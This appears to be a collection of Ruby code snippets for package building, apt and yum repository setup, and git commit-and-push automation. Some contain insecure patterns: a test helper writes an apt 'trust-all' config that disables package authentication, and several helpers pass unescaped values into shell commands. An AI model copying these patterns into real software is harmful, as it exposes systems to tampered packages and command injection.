"def add_repo(pkg)\n if pkg[:repo] != nil\n if pkg[:repo].match(/^deb/)\n if pkg[:key] != nil\n # download and add key, add repo\n script \"add_repository\" do\n interpreter \"bash\"\n user \"root\"\n cwd \"/tmp\"\n code <<-EOS\n wget -q #{pkg[:key]} -O- | apt-key add -\n mkdir -p /etc/apt/sources.list.d\n echo \"#{pkg[:repo]}\" > /etc/apt/sources.list.d/virtualbox.list\n EOS\n end\n end\n elsif pkg[:repo].match(/^ppa/)\n # don't care about :key, add repo\n script \"add_repository\" do\n interpreter \"bash\"\n user \"root\"\n cwd \"/tmp\"\n code \"add-apt-repository #{pkg[:repo]}\"\n end\n end\n end\nend",
"def install_in_ubuntu\n install_ppa(node['SignalFx_ppa']['collectd']['name'],\n node['SignalFx_ppa']['collectd']['uri'])\n install_ppa(node['SignalFx_ppa']['collectd_plugin']['name'],\n node['SignalFx_ppa']['collectd_plugin']['uri'])\n ubuntu_update\n install_package 'collectd'\nend",
"def update\n app_dir = app_dir\n # there's probably a git gem we could use here\n system \"cd #{app_dir} && git pull\" unless app_dir.nil?\n system \"cd #{File.dirname(__FILE__)} && git pull\"\nend",
"def do_dmg_package_resource!\n dmg_package 'Chef Development Kit' do\n app dmg_package_app\n volumes_dir 'Chef Development Kit'\n source dmg_package_source\n type 'pkg'\n package_id 'com.getchef.pkg.chefdk'\n checksum dmg_package_checksum\n end\n end",
"def cmd_commit(msg)\n comment = msg[2].tr('\"', '')\n run_cmd(\"cd /etc;git add . && git commit -a -m \\\"#{comment}\\\"\")\n end",
"def install_custom!\n remote_file local_path do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n dpkg_package local_path\n end",
"def packages_upload_deb(owner, repo, opts = {})\n data, _status_code, _headers = packages_upload_deb_with_http_info(owner, repo, opts)\n return data\n end",
"def generate_debian_dir(pkginfo, dir, options)\n options, unknown_options = Kernel.filter_options options,\n :distribution => nil,\n :override_existing => true,\n :patch_dir => nil\n\n distribution = options[:distribution]\n\n # Prepare fields for template\n package_info = pkginfo\n debian_name = debian_name(pkginfo)\n debian_version = debian_version(pkginfo, distribution)\n versioned_name = versioned_name(pkginfo, distribution)\n short_documentation = pkginfo.short_documentation\n documentation = pkginfo.documentation\n origin_information = pkginfo.origin_information\n source_files = pkginfo.source_files\n\n upstream_name = pkginfo.name\n copyright = pkginfo.copyright\n license = pkginfo.licenses\n\n deps = @dep_manager.filtered_dependencies(pkginfo)\n\n #debian names of rock packages\n deps_rock_packages = deps[:rock]\n deps_osdeps_packages = deps[:osdeps]\n deps_nonnative_packages = deps[:nonnative].to_a.flatten.compact\n\n dependencies = (deps_rock_packages + deps_osdeps_packages + deps_nonnative_packages).flatten\n build_dependencies = dependencies.dup\n\n this_rock_release = TargetPlatform.new(rock_release_name, target_platform.architecture)\n @rock_autobuild_deps[pkginfo.build_type].each do |pkginfo|\n name = debian_name(pkginfo)\n build_dependencies << this_rock_release.packageReleaseName(name)\n end\n\n # To handle postinstall\n DEFAULT_BUILD_DEPENDENCIES.each do |dep|\n build_dependencies << dep\n end\n\n DEFAULT_RUNTIME_DEPENDENCIES.each do |dep|\n dependencies << dep\n end\n\n if pkginfo.build_type == :cmake\n build_dependencies << \"cmake\"\n elsif pkginfo.build_type == :orogen\n build_dependencies << \"cmake\"\n orogen_command = pkginfo.orogen_command\n elsif pkginfo.build_type == :autotools\n if pkginfo.using_libtool\n build_dependencies << \"libtool\"\n end\n build_dependencies << \"autotools-dev\" # as autotools seems to be virtual...\n build_dependencies << \"autoconf\"\n build_dependencies << \"automake\"\n build_dependencies << \"dh-autoreconf\"\n elsif pkginfo.build_type == :ruby\n if pkginfo.is_bundle?\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle ruby package\"\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n dir = cleanup_existing_dir(dir, options)\n existing_debian_dir = File.join(pkginfo.srcdir,\"debian\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES\n end\n FileUtils.mkdir_p dir\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n rendered = template.result(binding)\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n if options[:patch_dir]\n whitelist = [ \"debian/rules\",\"debian/control\",\"debian/install\" ]\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: whitelist,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to debian folder of #{pkginfo.name}\"\n end\n end\n\n ########################\n # debian/compat\n 
########################\n compatfile = File.join(dir,\"compat\")\n set_compat_level(DEBHELPER_DEFAULT_COMPAT_LEVEL, compatfile)\n end",
"def tailor_package_to_platform\n @package.app('Dropbox')\n @package.volumes_dir('Dropbox Installer')\n @package.source(URI.encode(\"file://#{download_dest}\"))\n end",
"def commit_modified_files_task\n really_modified = `#{git} ls-files -m #{modified_files.entries.join(' ')}`.split(\"\\n\")\n if really_modified.any?\n really_modified.each { |file| sh git, 'add', file }\n sh git, 'commit', '-m', \"Released #{gemspec.name} gem version #{gemspec.version}.\"\n end\n end",
"def apt_get_update_script\n <<-ENDSCRIPT\n if [[ ! -f /tmp/apt_sources.md5 ]]; then\n apt-get -q update\n\n md5sum /etc/apt/sources.list > /tmp/apt_sources.md5\n md5sum /etc/apt/sources.list.d/*.list >> /tmp/apt_sources.md5\n else\n md5sum /etc/apt/sources.list > /tmp/apt_sources_compare.md5\n md5sum /etc/apt/sources.list.d/*.list >> /tmp/apt_sources_compare.md5\n\n if [[ `diff /tmp/apt_sources.md5 /tmp/apt_sources_compare.md5` ]]; then\n apt-get -q update\n fi\n\n mv /tmp/apt_sources_compare.md5 /tmp/apt_sources.md5\n fi\n ENDSCRIPT\n end",
"def install_dev_repos_on(package, host, sha, repo_configs_dir, opts={})\n platform = host['platform'] =~ /^(debian|ubuntu)/ ? host['platform'].with_version_codename : host['platform']\n platform_configs_dir = File.join(repo_configs_dir, platform)\n\n case platform\n when /^(fedora|el|centos|sles)-(\\d+)-(.+)$/\n variant = (($1 == 'centos') ? 'el' : $1)\n fedora_prefix = ((variant == 'fedora') ? 'f' : '')\n version = $2\n arch = $3\n\n pattern = 'pl-%s-%s-%s-%s%s-%s.repo'\n\n repo_filename = pattern % [\n package,\n sha,\n variant,\n fedora_prefix,\n version,\n arch\n ]\n\n repo = fetch_http_file(\n \"%s/%s/%s/repo_configs/rpm/\" % [opts[:dev_builds_url],package, sha],\n repo_filename,\n platform_configs_dir\n )\n\n if /sles/i.match(platform)\n scp_to(host, repo, '/etc/zypp/repos.d/')\n else\n scp_to(host, repo, '/etc/yum.repos.d/')\n end\n\n when /^(debian|ubuntu)-([^-]+)-(.+)$/\n variant = $1\n version = $2\n arch = $3\n\n list = fetch_http_file(\n \"%s/%s/%s/repo_configs/deb/\" % [opts[:dev_builds_url],package, sha],\n \"pl-%s-%s-%s.list\" % [package, sha, version],\n platform_configs_dir\n )\n\n scp_to host, list, '/etc/apt/sources.list.d'\n if variant == 'ubuntu' && version.split('.').first.to_i >= 18\n apt_conf_content = 'Acquire::AllowInsecureRepositories \"true\";'\n else\n apt_conf_content = 'APT::Get::AllowUnauthenticated \"true\";'\n end\n create_remote_file(host, '/etc/apt/apt.conf.d/99trust-all', apt_conf_content)\n on host, 'apt-get update'\n else\n host.logger.notify(\"No repository installation step for #{platform} yet...\")\n end\n end",
"def commit(message)\n Dubya.logger.info \"Updating Git repository...\"\n system %(cd #{path} && git commit -am \"#{message}\" && git push)\n end",
"def add_source (source)\n open('/etc/apt/sources.list', 'a') { |f|\n f.puts source\n }\n end",
"def commit_to_git\n puts `git add .`\n puts `git commit -a -m \"New poshts for the syhtt\"`\n puts `git push blahg master`\n end",
"def commit_module(puppet_module)\n changes = Puppler::Git::Changes.new(puppet_module.name, puppet_module.git)\n commit_message = changelog(changes)\n unless options[:commit]\n log_info \"Not committing the following changes as requested: '#{changes.summary}'\"\n return\n end\n File.open(Puppler.workdir.join(\"commit_msg\"), 'w') do |file|\n file.write(commit_message)\n end\n\n git ['add', puppet_module.git.bundle.path.to_s], quiet: false, log_commandline: true\n git ['commit', '--file', Puppler.workdir.join(\"commit_msg\").to_s, puppet_module.git.bundle.path.to_s], quiet: false, log_commandline: true\n end",
"def update(dir, name = nil)\n since = Changelog.last_sha(@releases)\n release = Release.new(name)\n release.update(dir, since)\n add_release(release)\n end",
"def source_package(options)\n package_common(options) do |pkg|\n pkg.srcdir = pkg.name\n yield(pkg) if block_given?\n end\nend",
"def propose_dependency_update(app, branch_key, dependencies, target_version, base_branch)\n am_suffix = current_default_branch == base_branch ? '' : \"-#{base_branch}\"\n branch_name = '' == branch_key ? \"AM#{am_suffix}_update_#{get_shortest_group_name(dependencies)}\" : \"AM#{am_suffix}_#{branch_key}\"\n merge_origin = git_local_branch_list.include?(branch_name)\n git_checkout(base_branch)\n git_checkout(branch_name, true)\n git_merge(\"origin/#{base_branch}\") if merge_origin\n\n if patch_versions(app, dependencies, target_version)\n git_push\n else\n git_checkout(base_branch)\n mysystem(\"git branch -D #{branch_name} 2> /dev/null 1> /dev/null\")\n end\n end",
"def updateGit(source)\n dir = File.basename(source.sub(/\\.git$/, ''))\n if File.exists?(dir)\n system 'cd '+dir+' && git pull' or exit 1\n else\n system 'git clone ' + source or exit 1\n end\nend",
"def updateGit(source)\n dir = File.basename(source.sub(/\\.git$/, ''))\n if File.exists?(dir)\n system 'cd '+dir+' && git pull' or exit 1\n else\n system 'git clone ' + source or exit 1\n end\nend",
"def commit\n @repo.commit\n end",
"def make_pkg\n with_src_dir do\n if @tool == 'sbt'\n msg \"Updating Kafka\"\n exec './sbt update'\n msg \"Building Kafka\"\n exec './sbt package'\n #exec './sbt assembly-package-dependency'\n exec './sbt release-tar'\n else\n msg \"Using gradle\"\n exec './gradlew clean'\n exec './gradlew releaseTarGz'\n end\n end\n rel_dir = \"#{@src_dir}/target/RELEASE/kafka_*\"\n source_jar = expand \"#{rel_dir}/kafka_*.jar\"\n cp source_jar, \"#{@workdir}/usr/lib/kafka\"\n cptree \"#{rel_dir}/libs\", \"#{@workdir}/usr/lib/kafka\"\n cptree \"#{rel_dir}/config\", \"#{@workdir}/usr/lib/kafka\"\n cptree \"#{rel_dir}/bin\", \"#{@workdir}/usr/lib/kafka\"\n\n build_pkg\n end",
"def update_repository\n %x( cd #{@work_dir} && git fetch --tags )\n end",
"def packaging_task(dir_path, pkg_name)\n chdir dir_path do\n sh \"#{ZIP} #{ZIP_ARGS} -r -o ../#{pkg_name} * **/*\"\n end\nend",
"def stage_apt_archives(directory)\n find_command = \"find #{Pkg::Config.apt_repo_staging_path} -type d -name #{directory}\"\n find_command = \"find #{Pkg::Config.apt_repo_staging_path} -maxdepth 2 -type f\" if directory == 'main'\n command = <<-CMD\n for stuff in $(#{find_command}); do\n find $stuff -type l -delete\n codename=$(dirname ${stuff##{Pkg::Config.apt_repo_staging_path}/})\n sudo mkdir --parents #{Pkg::Config.freight_archive_path}/$codename\n sudo chown root:release -R #{Pkg::Config.freight_archive_path}/$codename\n sudo chmod g+w -R #{Pkg::Config.freight_archive_path}/$codename\n mv $stuff #{Pkg::Config.freight_archive_path}/$codename\n\n pool_directory=#{Pkg::Config.apt_repo_path}/pool/$codename/#{directory}\n if [ ! -d $pool_directory ]; then\n echo \"Can't find directory $pool_directory, it may have already been archived, skipping . . .\"\n continue\n fi\n sudo mkdir --parents /opt/tmp-apt\n sudo chown root:release -R /opt/tmp-apt\n sudo chmod g+w -R /opt/tmp-apt\n mv $pool_directory /opt/tmp-apt\n done\n CMD\n Pkg::Util::Net.remote_execute(Pkg::Config.staging_server, command)\n end",
"def packaging_task(dir_path, pkg_name)\n chdir dir_path do\n sh \"#{ZIP} -9 -r -o ../#{pkg_name} * **/*\"\n end\nend",
"def update_appd_cookbook\n @ssh.exec! \"cd #{APPD_COOKBOOK_PATH}; git pull origin master\", sudo: true\n chef_exec \"berks install --path #{@cookbook_path.first} --berksfile #{APPD_COOKBOOK_PATH}/Berksfile\"\n end",
"def git\n require 'parsedate'\n puts 'Doing local Git commit...'\n d = Time.new()\n git_comment = \"#{d}\"\n `git add ../.`\n `git commit ../. -m \"#{git_comment}\"`\nend",
"def gemfile spec, source, destination = nil\n destination ||= File.expand_path \".\"\n\n require \"rubygems/builder\"\n\n Dir.chdir source do\n FileUtils.mv Gem::Builder.new(spec).build, destination\n end\n\n destination\n end",
"def push(downstream, upstream, remote_branch='svn_git_port')\n name=get_dir_name(downstream, upstream)\n upstream_dir=File.join(name, 'upstream')\n Dir.chdir(upstream_dir) do\n puts `git checkout -b push`\n puts `git push upstream HEAD:#{remote_branch}`\n end\nend",
"def scm_update(path,uri=nil)\n cd(path) { sh 'svn', 'update' }\n end",
"def upgrade_repo!\n package 'apt-transport-https'\n include_recipe \"apt-chef::#{new_resource.channel}\"\n package('chefdk') { action :upgrade }\n end",
"def pkg_cmd; \"#{pkg_binary}\" end",
"def rearrange_and_reship(rake, target_repo, signing_bundle)\n puts \"Retrieving packages...\"\n system(\"#{rake} -s pl:jenkins:retrieve &> /dev/null\")\n\n puts \"Moving the packages into the new layout...\"\n puts \"Moving debs...\"\n rearrange_packages(\"pkg/deb\", \"new_pkg/deb\", target_repo, [\"\"])\n puts \"Moving rpms...\"\n rearrange_packages(\"pkg/el\", \"new_pkg/el\", target_repo, [\"i386\", \"x86_64\", \"SRPMS\"])\n rearrange_packages(\"pkg/fedora\", \"new_pkg/fedora\", target_repo, [\"i386\", \"x86_64\", \"SRPMS\"])\n\n puts \"Moving new_pkg into place on top of pkg...\"\n FileUtils.mv(\"pkg\", \"old_pkg\")\n FileUtils.mv(\"new_pkg\", \"pkg\")\n\n puts \"uber_shipping relocated packages...\"\n ENV[\"SIGNING_BUNDLE\"] = \"../#{signing_bundle}\"\n ENV[\"TAR\"] = \"FALSE\"\n system(\"#{rake} -s pl:jenkins:sign_all pl:uber_ship pl:remote:update_apt_repo pl:remote:update_yum_repo\")\nend",
"def BackUpAllTargetSources\n Yast.import \"Directory\"\n\n repos_dir = \"/etc/zypp/repos.d\"\n\n if !FileUtils.Exists(repos_dir)\n Builtins.y2error(\"Directory %1 doesn't exist!\", repos_dir)\n return\n end\n\n current_repos = Convert.convert(\n SCR.Read(path(\".target.dir\"), repos_dir),\n :from => \"any\",\n :to => \"list <string>\"\n )\n\n if current_repos == nil || Builtins.size(current_repos) == 0\n Builtins.y2warning(\n \"There are currently no repos in %1 conf dir\",\n repos_dir\n )\n return\n else\n Builtins.y2milestone(\n \"These repos currently exist on a target: %1\",\n current_repos\n )\n end\n\n cmd = Convert.to_map(\n WFM.Execute(path(\".local.bash_output\"), \"date +%Y%m%d-%H%M%S\")\n )\n a_name_list = Builtins.splitstring(\n Ops.get_string(cmd, \"stdout\", \"the_latest\"),\n \"\\n\"\n )\n archive_name = Ops.add(\n Ops.add(\"repos_\", Ops.get(a_name_list, 0, \"\")),\n \".tgz\"\n )\n\n shellcommand = Builtins.sformat(\n \"mkdir -p '%1' && cd '%1' && /bin/tar -czf '%2' '%3'\",\n String.Quote(Ops.add(Directory.vardir, \"/repos.d_backup/\")),\n String.Quote(archive_name),\n String.Quote(repos_dir)\n )\n cmd = Convert.to_map(\n SCR.Execute(path(\".target.bash_output\"), shellcommand)\n )\n\n if Ops.get_integer(cmd, \"exit\", -1) != 0\n Builtins.y2error(\n \"Unable to backup current repos; Command >%1< returned: %2\",\n shellcommand,\n cmd\n )\n end\n\n success = nil\n\n Builtins.foreach(current_repos) do |one_repo|\n one_repo = Ops.add(Ops.add(repos_dir, \"/\"), one_repo)\n Builtins.y2milestone(\"Removing target repository %1\", one_repo)\n success = Convert.to_boolean(\n SCR.Execute(path(\".target.remove\"), one_repo)\n )\n Builtins.y2error(\"Cannot remove %1 file\", one_repo) if success != true\n end\n\n Builtins.y2milestone(\"All old repositories were removed from the target\")\n\n nil\n end",
"def package(path, target)\n # Load manifest\n puts \"Load manifest...\"\n manifest = YAML::load_file(File.join(path, 'manifest.yml'))\n \n # Target directory for package files\n puts \"Target is: #{target}\"\n Dir.mkdir(target) if not File.exists?(target)\n \n # Package name\n package = \"#{manifest['name']}-#{manifest['version']}\"\n puts \"Package: #{package}\"\n \n # Tgz\n manifest['package'] = \"#{package}.tgz\"\n command = \"tar -czf #{package}.tgz --exclude pkg -C #{path} .\"\n puts \"Packing: #{command}\"\n system command\n \n # Move\n puts \"Finishing..\"\n FileUtils.mv(\"#{package}.tgz\", target)\n File.open(File.join(target, \"#{package}.yml\"), 'w') do |f|\n f.puts(manifest.to_yaml)\n f.close\n end\n \n puts \"Done.\"\nend",
"def package_file\n File.join('/tmp/fpm-recipes/duo-openvpn/pkg',\n case node['platform_family']\n when 'debian'\n \"duo-openvpn_#{version}-#{revision}_amd64.deb\"\n when 'rhel'\n \"duo-openvpn-#{version}-#{revision}.x86_64.rpm\"\n end)\n end",
"def push_fedora(cx)\n\tComponent.reset_counters( cx.id, :master_files )\n\ttitle = (cx.title or cx.content_desc.strip)\n\tputs \"[#{cx.id}]: #{title}\"\n\tFedora.create_or_update_object( cx, title )\n\tcx.update_attribute( :date_dl_ingest, Time.now ) if cx.date_dl_ingest.nil? \n\tcx.update_metadata('allxml')\n\tcx.save! \n\tcx.master_files.each { |mf| mf.update_metadata( 'allxml' ); mf.save! } \nend",
"def update_version(branch, version, opts={})\n dir = File.join(branch, version)\n status \"Update version #{dir}\"\n\n # initialize directory\n run \"rm -rf #{dir}\"\n run \"mkdir -p #{dir}\"\n run \"cp docker-entrypoint.sh #{dir}\"\n\n if branch == \"ensocoin\"\n run \"sed -i 's/printtoconsole=1/addnode=178.88.115.118\\\\\\n addnode=194.87.146.58\\\\\\n printtoconsole=1/' #{dir}/docker-entrypoint.sh\"\n\n run \"sed -i 's/bitcoin.conf/ensocoin.conf/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-cli/ensocoin-cli/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-tx/ensocoin-tx/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/test_bitcoin/test_ensocoin/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoind/ensocoind/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/\\\\\\.bitcoin/.ensocoin/' #{dir}/docker-entrypoint.sh\"\n elsif branch == \"thebestcoin\"\n run \"sed -i 's/^\\\\(\\\\s*\\\\)printtoconsole=1/\\\\1addnode=5.230.11.232\\\\\\n\\\\1addnode=5.230.11.233\\\\\\n\\\\1printtoconsole=1/' #{dir}/docker-entrypoint.sh\"\n\n run \"sed -i 's/bitcoin.conf/thebestcoin.conf/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-cli/thebestcoin-cli/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-tx/thebestcoin-tx/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/test_bitcoin/test_thebestcoin/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoind/thebestcoind/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/\\\\\\.bitcoin/.thebestcoin/' #{dir}/docker-entrypoint.sh\"\n end\n\n # render Dockerfile\n opts[:version] = version\n opts[:home] = '.bitcoin'\n opts[:ports] = '8332 8333 18332 18333'\n\n if branch == \"ensocoin\"\n opts[:home] = '.ensocoin'\n opts[:ports] = '7992 7993 17992 17993'\n elsif branch == \"thebestcoin\"\n opts[:home] = '.thebestcoin'\n opts[:ports] = '8801 8802 18801 18802'\n end\n\n dockerfile = ERB.new(File.read(\"Dockerfile.erb\"), nil, \"-\")\n result = dockerfile.result(OpenStruct.new(opts).instance_eval { binding })\n File.write(File.join(dir, \"Dockerfile\"), result)\nend",
"def install_dev_repo_on(host, package, sha, repo_configs_dir)\n platform = host['platform'] =~ /^(debian|ubuntu)/ ? host['platform'].with_version_codename : host['platform']\n platform_configs_dir = File.join(repo_configs_dir, platform)\n\n case platform\n when /^(fedora|el|centos)-(\\d+)-(.+)$/\n variant = (($1 == 'centos') ? 'el' : $1)\n fedora_prefix = ((variant == 'fedora') ? 'f' : '')\n version = $2\n arch = $3\n\n #hack for https://tickets.puppetlabs.com/browse/RE-1990\n # Previously this used `host.is_pe?`, but with AIO this is no longer\n # reliable. Defaulting to `true` since these tests only happen in PE.\n if true\n pattern = \"pl-%s-%s-repos-pe-%s-%s%s-%s.repo\"\n else\n pattern = \"pl-%s-%s-%s-%s%s-%s.repo\"\n end\n repo_filename = pattern % [\n package,\n sha,\n variant,\n fedora_prefix,\n version,\n arch\n ]\n\n repo = fetch(\n \"http://builds.puppetlabs.lan/%s/%s/repo_configs/rpm/\" % [package, sha],\n repo_filename,\n platform_configs_dir\n )\n\n scp_to(host, repo, '/etc/yum.repos.d/')\n\n when /^(debian|ubuntu)-([^-]+)-(.+)$/\n variant = $1\n version = $2\n arch = $3\n\n list = fetch(\n \"http://builds.puppetlabs.lan/%s/%s/repo_configs/deb/\" % [package, sha],\n \"pl-%s-%s-%s.list\" % [package, sha, version],\n platform_configs_dir\n )\n\n scp_to host, list, '/etc/apt/sources.list.d'\n on host, 'apt-get update'\n else\n host.logger.notify(\"No repository installation step for #{platform} yet...\")\n end\n end",
"def make_svn_changelog( dir='.' )\n\trequire 'xml/libxml'\n\n\tchangelog = ''\n\tpath_prefix = '/' + get_svn_path( dir ) + '/'\n\n\txmllog = make_xml_svn_log( dir, 0 )\n\n\tparser = XML::Parser.string( xmllog )\n\troot = parser.parse.root\n\troot.find( '//log/logentry' ).to_a.reverse.each do |entry|\n\t\ttrace \"Making a changelog entry for r%s\" % [ entry['revision'] ]\n\n\t\tadded = []\n\t\tdeleted = []\n\t\tchanged = []\n\n\t\tentry.find( 'paths/path').each do |path|\n\t\t\tpathname = path.content\n\t\t\tpathname.sub!( path_prefix , '' ) if pathname.count('/') > 1\n\n\t\t\tcase path['action']\n\t\t\twhen 'A', 'R'\n\t\t\t\tif path['copyfrom-path']\n\t\t\t\t\tverb = path['action'] == 'A' ? 'renamed' : 'copied'\n\t\t\t\t\tadded << \"%s\\n#{FILE_INDENT}-> #{verb} from %s@r%s\" % [\n\t\t\t\t\t\tpathname,\n\t\t\t\t\t\tpath['copyfrom-path'],\n\t\t\t\t\t\tpath['copyfrom-rev'],\n\t\t\t\t\t]\n\t\t\t\telse\n\t\t\t\t\tadded << \"%s (new)\" % [ pathname ]\n\t\t\t\tend\n\t\t\t\n\t\t\twhen 'M'\n\t\t\t\tchanged << pathname\n\t\t\t\n\t\t\twhen 'D'\n\t\t\t\tdeleted << pathname\n\t\t\t\n\t\t\telse\n\t\t\t\tlog \"Unknown action %p in rev %d\" % [ path['action'], entry['revision'] ]\n\t\t\tend\n\t\t\n\t\tend\n\n\t\tdate = Time.parse( entry.find_first('date').content )\n\n\t\t# cvs2svn doesn't set 'author'\n\t\tauthor = 'unknown'\n\t\tif entry.find_first( 'author' )\n\t\t\tauthor = entry.find_first( 'author' ).content\n\t\tend\n\t\t \n\t\tmsg = entry.find_first( 'msg' ).content\n\t\trev = entry['revision']\n\n\t\tchangelog << \"-- #{date.rfc2822} by #{author} (r#{rev}) -----\\n\"\n\t\tchangelog << \" Added: \" << humanize_file_list(added) << \"\\n\" unless added.empty?\n\t\tchangelog << \" Changed: \" << humanize_file_list(changed) << \"\\n\" unless changed.empty?\n\t\tchangelog << \" Deleted: \" << humanize_file_list(deleted) << \"\\n\" unless deleted.empty?\n\t\tchangelog << \"\\n\"\n\t\t\n\t\tindent = msg[/^(\\s*)/] + LOG_INDENT\n\t\t\n\t\tchangelog << indent << msg.strip.gsub(/\\n\\s*/m, \"\\n#{indent}\")\n\t\tchangelog << \"\\n\\n\\n\"\n\tend\n\t\n\treturn changelog\nend",
"def publish_to_cocoapods()\n command = \"cd downstream_repos/card.io-iOS-SDK;\"\n command += \"pod trunk push CardIO.podspec\"\n \n CommandProcessor.command(command, live_output=true)\nend",
"def git_update(dir=nil)\n if dir.nil?\n directory = \"#{CSV.split(\"/\")[0..-2].join(\"/\")}/\"\n else\n directory = dir\n end\n Dir.chdir(directory) do \n system('git pull origin master')\n end\nend",
"def rearrange_packages(source_directory, target_directory, target_repo, subdirs)\n targets = get_directories(source_directory)\n unless targets.empty?\n FileUtils.mkdir_p(target_directory)\n targets.each do |target|\n subdirs.each do |subdir|\n target_dir = \"#{target_directory}/#{target}/#{target_repo}/#{subdir}\"\n FileUtils.mkdir_p(target_dir)\n packages = get_files(\"#{source_directory}/#{target}/**/#{subdir}\")\n FileUtils.cp(packages, target_dir)\n end\n end\n end\nend",
"def repo_commit(msg)\n git :add => '-u'\n git :add => '.'\n git :commit => \"-m \\\"#{msg}\\\"\" \n end",
"def update_filepath(_package_id:, _filepath:, _sha1:, _size:); end",
"def after_release_email(tag, note, type, selector, options) \n command = \"origen web compile --remote --api\" \n Dir.chdir Origen.root do \n system command \n end \n end",
"def sync_code_dir\n fs_commands = { 'commit': '{\"commit-all\": true}', 'force-sync': \"\" }\n fs_commands.each do |fs_cmd, data|\n curl = %W[\n curl\n -X POST\n --cert $(puppet config print hostcert)\n --key $(puppet config print hostprivkey)\n --cacert $(puppet config print localcacert)\n -H \"Content-type: application/json\"\n https://#{master}:8140/file-sync/v1/#{fs_cmd}\n -d '#{data}'\n ].join(\" \")\n\n on(master, curl)\n end\n end",
"def branded_zone_post_install(options)\n options['zonedir'] = options['zonedir']+\"/\"+options['name']\n if File.directory?(options['zonedir'])\n options['clientdir'] = options['zonedir']+\"/root\"\n var_dir = \"/var/tmp\"\n tmp_dir = options['clientdir']+\"/\"+var_dir\n post_file = tmp_dir+\"/postinstall.sh\"\n tmp_file = \"/tmp/zone_\"+options['name']\n pkg_name = \"pkgutil.pkg\"\n pkg_url = $local_opencsw_mirror+\"/\"+pkg_name\n pkg_file = tmp_dir+\"/\"+pkg_name\n wget_file(options,pkg_url,pkg_file)\n file = File.open(tmp_file,\"w\")\n file.write(\"#!/usr/bin/bash\\n\")\n file.write(\"\\n\")\n file.write(\"# Post install script\\n\")\n file.write(\"\\n\")\n file.write(\"cd #{var_dir} ; echo y |pkgadd -d pkgutil.pkg CSWpkgutil\\n\")\n file.write(\"export PATH=/opt/csw/bin:$PATH\\n\")\n file.write(\"pkutil -i CSWwget\\n\")\n file.write(\"\\n\")\n file.close\n message = \"Information:\\tCreating post install script \"+post_file\n command = \"cp #{tmp_file} #{post_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n else\n handle_output(options,\"Warning:\\tZone #{options['name']} doesn't exist\")\n quit(options)\n end\n return\nend",
"def move_package\n begin\n package_file = File.join(@tmpdir, 'pkg', \"#{@plugin.vendor}-#{@package_name}-#{@plugin.metadata[:version]}.tar.gz\")\n FileUtils.cp(package_file, '.')\n rescue => e\n puts 'Could not copy package to working directory'\n raise e\n end\n end",
"def setup_new_package(package_name, parent_ids=[])\n package_id, definition = add_package(package_name, parent_ids)\n\n # update current package id\n set(current_package_id: package_id, current_definition: definition)\n end",
"def publish_changes(directory)\n return unless anything_to_commit?(directory)\n\n directory && :not_implemented\n end",
"def git_commit_and_push(cookbook_path, github_url)\n if File.exists?(File.join(cookbook_path, \".git\"))\n shell_out(\"git remote rm origin\", :cwd => cookbook_path)\n else\n shell_out!(\"git init\", :cwd => cookbook_path)\n end\n shell_out!(\"echo - $(date): Uploaded with knife github plugin. >> CHANGELOG.md \", :cwd => cookbook_path)\n shell_out!(\"git add .\", :cwd => cookbook_path)\n shell_out!(\"git commit -m 'creating initial cookbook structure from the knife-github plugin' \", :cwd => cookbook_path)\n shell_out!(\"git remote add origin #{github_url} \", :cwd => cookbook_path)\n shell_out!(\"git push -u origin master\", :cwd => cookbook_path)\n end",
"def install_jaunty_sources\n has_exec(\"apt-get update\", :action => :nothing)\n\n lines =<<-EOF\ndeb http://archive.ubuntu.com/ubuntu/ jaunty main restricted\ndeb http://archive.ubuntu.com/ubuntu/ jaunty universe\ndeb http://archive.ubuntu.com/ubuntu/ jaunty multiverse\ndeb-src http://archive.ubuntu.com/ubuntu/ jaunty main restricted\ndeb-src http://archive.ubuntu.com/ubuntu/ jaunty universe\ndeb-src http://archive.ubuntu.com/ubuntu/ jaunty multiverse\nEOF\n lines.each_line do |l|\n has_line_in_file do \n file \"/etc/apt/sources.list\"\n line l \n notifies get_exec(\"apt-get update\"), :run\n end\n end\n end",
"def package(output_dir = Pathname(Dir.pwd).expand_path)\n # Check the source\n check_source!\n # Turn the source into component parts to build a gem out of\n gem_parts = read_source_parts\n # Write these parts to a directory\n gem_dir = write_gem_dir(gem_parts)\n # Build a .gem file from this directory, and leave it in the `output_dir`\n build_package(gem_dir, output_dir)\n end",
"def run_package_command(cmd)\n if cmd.is_a?(Array)\n command = cmd[0]\n cmd_options.merge!(cmd[1])\n else\n command = cmd\n end\n\n shellout!(command, cwd: config.package_dir)\n end",
